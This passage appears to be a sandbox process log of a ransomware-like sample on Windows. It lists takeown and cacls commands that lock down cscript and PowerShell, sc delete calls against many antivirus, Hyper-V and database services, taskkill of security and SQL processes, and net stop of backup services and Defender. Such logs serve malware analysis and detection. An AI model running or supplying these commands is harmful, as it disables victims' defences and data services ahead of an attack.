C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:264

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
3⤵
PID:252

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d "network service"
3⤵
PID:4268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:276

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d system
3⤵
PID:3760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2436

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:3172

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cscript.exe /a
3⤵
- Modifies file permissions
PID:4484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2812

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
3⤵
PID:4012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2460

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
3⤵
PID:5112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4544

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
3⤵
PID:3680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1664

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
3⤵
PID:2676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5004

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
3⤵
PID:4152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1444

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
3⤵
PID:2996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3836

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d system
3⤵
PID:1064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1472

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:4336

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2260

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:4752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1832

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:4312

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2008

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:4744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4692

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:4568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:5088

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:4684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:5084

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:2700

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:4832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2592

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:3764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3256

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3252

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:1876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4084

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:3212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3692

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:1628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2364

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:4812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1236

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:508

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:1500

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\ProgramData /a
3⤵
- Modifies file permissions
PID:4932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3424

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /g Administrators:f
3⤵
PID:1896

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Users:r
3⤵
PID:4828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4132

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /g Administrators:r
3⤵
PID:4900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3556

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d SERVICE
3⤵
PID:5092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4104

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssqlserver
3⤵
PID:4384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3672

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d "network service"
3⤵
PID:3832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1288

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d system
3⤵
PID:4976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:3716

C:\Windows\SysWOW64\cacls.exe
cacls C:\ProgramData /e /d mssql$sqlexpress
3⤵
PID:852

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Users\Public /a
3⤵
- Modifies file permissions
PID:1624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3248

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /g Administrators:f
3⤵
PID:1104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4728

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Users:r
3⤵
PID:3436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:3448

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /g Administrators:r
3⤵
PID:1448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:744

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d SERVICE
3⤵
PID:4468

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssqlserver
3⤵
PID:4764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:4948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:64

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d "network service"
3⤵
PID:4280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1324

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d system
3⤵
PID:4076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Public /e /d mssql$sqlexpress
3⤵
PID:884

C:\Windows\SysWOW64\sc.exe
sc delete "vmickvpexchange"
3⤵
PID:1352

C:\Windows\SysWOW64\sc.exe
sc delete "vmicguestinterface"
3⤵
- Launches sc.exe
PID:384

C:\Windows\SysWOW64\sc.exe
sc delete "vmicshutdown"
3⤵
PID:1016

C:\Windows\SysWOW64\sc.exe
sc delete "vmicheartbeat"
3⤵
- Launches sc.exe
PID:4952

C:\Windows\SysWOW64\sc.exe
sc delete "vmicrdv"
3⤵
- Launches sc.exe
PID:728

C:\Windows\SysWOW64\sc.exe
sc delete "storflt"
3⤵
PID:1572

C:\Windows\SysWOW64\sc.exe
sc delete "vmictimesync"
3⤵
- Launches sc.exe
PID:2384

C:\Windows\SysWOW64\sc.exe
sc delete "vmicvss"
3⤵
- Launches sc.exe
PID:4324

C:\Windows\SysWOW64\sc.exe
sc delete "hvdsvc"
3⤵
PID:1392

C:\Windows\SysWOW64\sc.exe
sc delete "nvspwmi"
3⤵
- Launches sc.exe
PID:1340

C:\Windows\SysWOW64\sc.exe
sc delete "wmms"
3⤵
- Launches sc.exe
PID:3848

C:\Windows\SysWOW64\sc.exe
sc delete "AvgAdminServer"
3⤵
PID:1756

C:\Windows\SysWOW64\sc.exe
sc delete "AVG Antivirus"
3⤵
PID:2704

C:\Windows\SysWOW64\sc.exe
sc delete "avgAdminClient"
3⤵
PID:4628

C:\Windows\SysWOW64\sc.exe
sc delete "SAVService"
3⤵
- Launches sc.exe
PID:2092

C:\Windows\SysWOW64\sc.exe
sc delete "SAVAdminService"
3⤵
- Launches sc.exe
PID:1128

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos AutoUpdate Service"
3⤵
- Launches sc.exe
PID:264

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Clean Service"
3⤵
PID:252

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Device Control Service"
3⤵
- Launches sc.exe
PID:4760

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos File Scanner Service"
3⤵
PID:4276

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
- Launches sc.exe
PID:4776

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Health Service"
3⤵
- Launches sc.exe
PID:3760

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Agent"
3⤵
PID:740

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos MCS Client"
3⤵
PID:2864

C:\Windows\SysWOW64\sc.exe
sc delete "SntpService"
3⤵
PID:1504

C:\Windows\SysWOW64\sc.exe
sc delete "swc_service"
3⤵
- Launches sc.exe
PID:936

C:\Windows\SysWOW64\sc.exe
sc delete "swi_service"
3⤵
PID:4588

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos UI"
3⤵
- Launches sc.exe
PID:1508

C:\Windows\SysWOW64\sc.exe
sc delete "swi_update"
3⤵
PID:4252

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Web Control Service"
3⤵
PID:5112

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos System Protection Service"
3⤵
- Launches sc.exe
PID:3364

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Safestore Service"
3⤵
PID:4544

C:\Windows\SysWOW64\sc.exe
sc delete "hmpalertsvc"
3⤵
- Launches sc.exe
PID:3680

C:\Windows\SysWOW64\sc.exe
sc delete "RpcEptMapper"
3⤵
- Launches sc.exe
PID:4376

C:\Windows\SysWOW64\sc.exe
sc delete "Sophos Endpoint Defense Service"
3⤵
- Launches sc.exe
PID:4360

C:\Windows\SysWOW64\sc.exe
sc delete "SophosFIM"
3⤵
- Launches sc.exe
PID:2376

C:\Windows\SysWOW64\sc.exe
sc delete "swi_filter"
3⤵
- Launches sc.exe
PID:3532

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdGuardianDefaultInstance"
3⤵
- Launches sc.exe
PID:4748

C:\Windows\SysWOW64\sc.exe
sc delete "FirebirdServerDefaultInstance"
3⤵
PID:2408

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher"
3⤵
- Launches sc.exe
PID:4196

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLSERVER"
3⤵
- Launches sc.exe
PID:2456

C:\Windows\SysWOW64\sc.exe
sc delete "SQLSERVERAGENT"
3⤵
PID:3312

C:\Windows\SysWOW64\sc.exe
sc delete "SQLBrowser"
3⤵
- Launches sc.exe
PID:2752

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY"
3⤵
PID:4188

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer130"
3⤵
- Launches sc.exe
PID:1380

C:\Windows\SysWOW64\sc.exe
sc delete "SSISTELEMETRY130"
3⤵
PID:1300

C:\Windows\SysWOW64\sc.exe
sc delete "SQLWriter"
3⤵
- Launches sc.exe
PID:664

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$VEEAMSQL2012"
3⤵
PID:1808

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$VEEAMSQL2012"
3⤵
- Launches sc.exe
PID:4100

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL"
3⤵
- Launches sc.exe
PID:3332

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent"
3⤵
PID:2072

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerADHelper100"
3⤵
- Launches sc.exe
PID:688

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLServerOLAPService"
3⤵
PID:3544

C:\Windows\SysWOW64\sc.exe
sc delete "MsDtsServer100"
3⤵
PID:1860

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer"
3⤵
- Launches sc.exe
PID:604

C:\Windows\SysWOW64\sc.exe
sc delete "SQLTELEMETRY$HL"
3⤵
PID:4684

C:\Windows\SysWOW64\sc.exe
sc delete "TMBMServer"
3⤵
PID:4592

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$PROGID"
3⤵
- Launches sc.exe
PID:1924

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$WOLTERSKLUWER"
3⤵
PID:4856

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$PROGID"
3⤵
- Launches sc.exe
PID:2180

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$WOLTERSKLUWER"
3⤵
PID:2368

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQLFDLauncher$OPTIMA"
3⤵
- Launches sc.exe
PID:3288

C:\Windows\SysWOW64\sc.exe
sc delete "MSSQL$OPTIMA"
3⤵
PID:3572

C:\Windows\SysWOW64\sc.exe
sc delete "SQLAgent$OPTIMA"
3⤵
- Launches sc.exe
PID:1884

C:\Windows\SysWOW64\sc.exe
sc delete "ReportServer$OPTIMA"
3⤵
- Launches sc.exe
PID:3024

C:\Windows\SysWOW64\sc.exe
sc delete "msftesql$SQLEXPRESS"
3⤵
PID:3204

C:\Windows\SysWOW64\sc.exe
sc delete "postgresql-x64-9.4"
3⤵
PID:4408

C:\Windows\SysWOW64\sc.exe
sc delete "WRSVC"
3⤵
PID:2320

C:\Windows\SysWOW64\sc.exe
sc delete "ekrn"
3⤵
PID:4540

C:\Windows\SysWOW64\sc.exe
sc delete "ekrnEpsw"
3⤵
- Launches sc.exe
PID:1628

C:\Windows\SysWOW64\sc.exe
sc delete "klim6"
3⤵
- Launches sc.exe
PID:3944

C:\Windows\SysWOW64\sc.exe
sc delete "AVP18.0.0"
3⤵
PID:932

C:\Windows\SysWOW64\sc.exe
sc delete "KLIF"
3⤵
- Launches sc.exe
PID:2364

C:\Windows\SysWOW64\sc.exe
sc delete "klpd"
3⤵
- Launches sc.exe
PID:4812

C:\Windows\SysWOW64\sc.exe
sc delete "klflt"
3⤵
PID:1224

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupdisk"
3⤵
- Launches sc.exe
PID:1344

C:\Windows\SysWOW64\sc.exe
sc delete "klbackupflt"
3⤵
PID:5096

C:\Windows\SysWOW64\sc.exe
sc delete "klkbdflt"
3⤵
- Launches sc.exe
PID:3004

C:\Windows\SysWOW64\sc.exe
sc delete "klmouflt"
3⤵
PID:2236

C:\Windows\SysWOW64\sc.exe
sc delete "klhk"
3⤵
- Launches sc.exe
PID:3940

C:\Windows\SysWOW64\sc.exe
sc delete "KSDE1.0.0"
3⤵
- Launches sc.exe
PID:3424

C:\Windows\SysWOW64\sc.exe
sc delete "kltap"
3⤵
- Launches sc.exe
PID:4532

C:\Windows\SysWOW64\sc.exe
sc delete "ScSecSvc"
3⤵
- Launches sc.exe
PID:4320

C:\Windows\SysWOW64\sc.exe
sc delete "Core Mail Protection"
3⤵
- Launches sc.exe
PID:4144

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning Server"
3⤵
PID:1028

C:\Windows\SysWOW64\sc.exe
sc delete "Core Scanning ServerEx"
3⤵
- Launches sc.exe
PID:4132

C:\Windows\SysWOW64\sc.exe
sc delete "Online Protection System"
3⤵
PID:4900

C:\Windows\SysWOW64\sc.exe
sc delete "RepairService"
3⤵
PID:4404

C:\Windows\SysWOW64\sc.exe
sc delete "Core Browsing Protection"
3⤵
- Launches sc.exe
PID:1960

C:\Windows\SysWOW64\sc.exe
sc delete "Quick Update Service"
3⤵
- Launches sc.exe
PID:1320

C:\Windows\SysWOW64\sc.exe
sc delete "McAfeeFramework"
3⤵
PID:4968

C:\Windows\SysWOW64\sc.exe
sc delete "macmnsvc"
3⤵
PID:4384

C:\Windows\SysWOW64\sc.exe
sc delete "masvc"
3⤵
- Launches sc.exe
PID:3824

C:\Windows\SysWOW64\sc.exe
sc delete "mfemms"
3⤵
PID:3832

C:\Windows\SysWOW64\sc.exe
sc delete "mfevtp"
3⤵
PID:4860

C:\Windows\SysWOW64\sc.exe
sc delete "TmFilter"
3⤵
- Launches sc.exe
PID:4976

C:\Windows\SysWOW64\sc.exe
sc delete "TMLWCSService"
3⤵
- Launches sc.exe
PID:3716

C:\Windows\SysWOW64\sc.exe
sc delete "tmusa"
3⤵
PID:852

C:\Windows\SysWOW64\sc.exe
sc delete "TmPreFilter"
3⤵
PID:1624

C:\Windows\SysWOW64\sc.exe
sc delete "TMSmartRelayService"
3⤵
PID:1240

C:\Windows\SysWOW64\sc.exe
sc delete "TMiCRCScanService"
3⤵
- Launches sc.exe
PID:1104

C:\Windows\SysWOW64\sc.exe
sc delete "VSApiNt"
3⤵
- Launches sc.exe
PID:5068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShadowProtectSvc
4⤵
PID:4880

C:\Windows\SysWOW64\sc.exe
sc delete "TmCCSF"
3⤵
- Launches sc.exe
PID:4696

C:\Windows\SysWOW64\sc.exe
sc delete "tmlisten"
3⤵
PID:2480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPAdminV4
4⤵
PID:2292

C:\Windows\SysWOW64\sc.exe
sc delete "TmProxy"
3⤵
PID:4092

C:\Windows\SysWOW64\sc.exe
sc delete "ntrtscan"
3⤵
PID:4288

C:\Windows\SysWOW64\sc.exe
sc delete "ofcservice"
3⤵
- Launches sc.exe
PID:4936

C:\Windows\SysWOW64\sc.exe
sc delete "TmPfw"
3⤵
- Launches sc.exe
PID:4468

C:\Windows\SysWOW64\sc.exe
sc delete "PccNTUpd"
3⤵
PID:1684

C:\Windows\SysWOW64\sc.exe
sc delete "PandaAetherAgent"
3⤵
- Launches sc.exe
PID:3624

C:\Windows\SysWOW64\sc.exe
sc delete "PSUAService"
3⤵
- Launches sc.exe
PID:3996

C:\Windows\SysWOW64\sc.exe
sc delete "NanoServiceMain"
3⤵
- Launches sc.exe
PID:4284

C:\Windows\SysWOW64\sc.exe
sc delete "EPIntegrationService"
3⤵
PID:4280

C:\Windows\SysWOW64\sc.exe
sc delete "EPProtectedService"
3⤵
PID:1816

C:\Windows\SysWOW64\sc.exe
sc delete "EPRedline"
3⤵
- Launches sc.exe
PID:3360

C:\Windows\SysWOW64\sc.exe
sc delete "EPSecurityService"
3⤵
- Launches sc.exe
PID:1456

C:\Windows\SysWOW64\sc.exe
sc delete "EPUpdateService"
3⤵
- Launches sc.exe
PID:2772

C:\Windows\SysWOW64\sc.exe
sc delete "UniFi"
3⤵
PID:3412

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im PccNTMon.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im NTRtScan.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4324

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmListen.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4700

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmCCSF.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmProxy.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4120

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:264

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TMBMSRV.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im TmPfw.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im CNTAoSMgr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlbrowser.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlwriter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4012

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msmdsrv.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4376

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im MsDtsSrvr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1180

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlceip.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4872

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:600

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im Ssms.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3312

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im SQLAGENT.EXE
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdhost.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im fdlauncher.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4688

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im ReportingServicesService.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2808

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im msftesql.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3288

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im pg_ctl.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4388

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im postgres.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3212

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:4448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:3484

C:\Windows\SysWOW64\net.exe
net stop MSSQL$ISARS
3⤵
PID:4808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ISARS
4⤵
PID:1296

C:\Windows\SysWOW64\net.exe
net stop MSSQL$MSFW
3⤵
PID:4508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$MSFW
4⤵
PID:3668

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$ISARS
3⤵
PID:3992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ISARS
4⤵
PID:1344

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$MSFW
3⤵
PID:5096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$MSFW
4⤵
PID:4932

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser
3⤵
PID:2860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
4⤵
PID:3496

C:\Windows\SysWOW64\net.exe
net stop ReportServer$ISARS
3⤵
PID:988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$ISARS
4⤵
PID:4320

C:\Windows\SysWOW64\net.exe
net stop SQLWriter
3⤵
PID:4784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter
4⤵
PID:1280

C:\Windows\SysWOW64\net.exe
net stop WinDefend
3⤵
PID:2256

C:\Windows\SysWOW64\net1.exe
